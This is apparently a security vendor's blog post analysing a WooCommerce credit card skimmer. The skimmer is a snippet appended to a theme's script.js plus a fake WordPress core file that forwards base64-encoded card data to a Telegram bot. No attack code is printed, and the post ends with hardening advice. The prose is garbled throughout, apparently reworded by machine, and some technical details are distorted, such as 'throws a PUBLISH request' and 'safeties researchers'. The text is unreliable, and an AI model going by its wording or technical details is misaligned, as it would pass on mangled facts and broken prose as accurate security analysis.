WooCommerce Credit Card Skimmer uses Telegram Bot to exfiltrate stolen data

Our story begins like many others told on this blog: a new customer reported to us about credit card theft on his e-commerce site.

The website owner had received complaints from several customers who reported fake transactions on their cards shortly after purchasing from their online store, so the webmaster suspected something was wrong.

Fortunately, our new client wasted no time looking for a solution and came to us for help almost immediately after receiving the complaints.

Let the investigation begin

The first thing we usually do when looking for credit card skimming malware is to inspect the payment page for suspicious content. It is very common with this type of infection that malicious JavaScript from strange third parties appears in the source code, and can be easily spotted using a script blocker browser extension.

In this case, no such resource was being loaded. A manual inspection of the source code of the payment page did not reveal anything abnormal. Our next step was to verify recently modified files and run a basic WordPress integrity check.

Recent environment changes

The first reported case of credit card theft on the site had only taken place three days previously, which greatly facilitated our work in terms of inspecting recent changes in the environment. When credit card theft issues go unaddressed for too long, malicious file changes can get buried in a sea of ​​plugin updates and other benign website maintenance activity, making more difficult to locate the payload.

A number of files were modified over the weekend, but we quickly located two that contained the credit card skimming payload:


Let’s take a look, shall we?

Payload Analysis

The first part of our credit card skimmer was located in the script.js file, a custom file added to the popular Storefront WooCommerce theme and included in the checkout page.

At the bottom of the file, we see this JavaScript snippet:

Malicious JavaScript sending stolen credit card data to a malicious PHP file.

What does it do? Although it looks incomplete with what appears to be an empty function, we can see that it still throws a PUBLISH request when triggered by the “To orderlocated on the payment page of the website.

A compromised checkout page in a WooCommerce environment.

The malicious script uses the btoa( JavaScript function for serialize so what base64 encode the contents. He then sends it to feed-rss-comments.php file located in wp-includes main files directory.

Wait a second, what does WordPress comments have to do with payment processing, and why would this script send it to this file?

In fact, WooCommerce transaction data is stored in the wp_comments table as well as other locations, but that’s not exactly what was happening here.

Take a look at this feed-rss-comments.php file reveals what is really going on:

A malicious PHP credit card theft script that exfiltrates data to the Telegram chat service.

As it turns out, feed-rss-comments.php is not a WordPress core file at all!

There is a main WordPress file in the same directory with a very similar name feed-rss2-comments.php, but it certainly does not contain any of these codes.

Checking above we can see that this bogus/false base file is taking information sent to it from custom script.js file and performs the following actions:

  1. Receives input given to it, adding user agent and IP information
  2. Decodes base64 encoded content
  3. Uses the Telegram API to send this content to a designated chat bot via CURL

So, every time an order was placed on the infected website, the credit card details were transferred to a Telegram chat room where they were quickly sold on the black market, leading to fake card transactions. victim’s credit.

Telegram exfiltration moves to WooCommerce

Telegram was considered a useful service for attackers, given the encrypted nature of the communication service. It allows attackers to steal data while being able to hide behind a cloak of anonymity. Unlike most credit card exfiltrations we see that send the data to a remote domain or IP address, scammers using Telegram cannot be tied to a specific location or server.

This is not the first time that Telegram has been used to exfiltrate stolen credit card details or other sensitive data. We have many existing blog posts documenting how the encrypted messaging service was used to harvest administrator login credentials through an infected computer wp-login.php archive or transfer data from Phishing pages.

In recent years, other safeties researchers also have documented Telegram used to dodge stolen credit card details. It is now shown that such exfiltration methods also take place in at least one WooCommerce environment.

In conclusion

As we have writing About this blog, WordPress/WooCommerce has quickly become the best CMS platform for credit card skimming malware, overtaking Magento and other purpose-built e-commerce platforms over the course of the year last.

In fact, according to our SiteCheck data, so far this year, WordPress websites represent more than 60% known credit card skimming malware detections:

A graph showing the CMS distribution of websites affected by the MageCart malware so far in 2022.

This represents an increase from approximately ⅓ of the previous year’s detections that we reported in our 2021 Hacked Websites Report. We anticipate that exfiltration techniques documented for other platforms will continue to emerge for WooCommerce.

E-commerce website owners should note and act accordingly to keep their websites and customer data secure:

  • Keep all software up to date with routine maintenance
  • Protect your admin panel from unauthorized access
  • Use strong passwords
  • Place your website behind a firewall service

It’s better to treat security as a high-priority issue early on than to wait until your environment is compromised.

If the worst gets worse and you start receiving customer complaints about fraudulent transactions or stolen data, you can always count on us to protect you. help clear infection!

Comments are closed.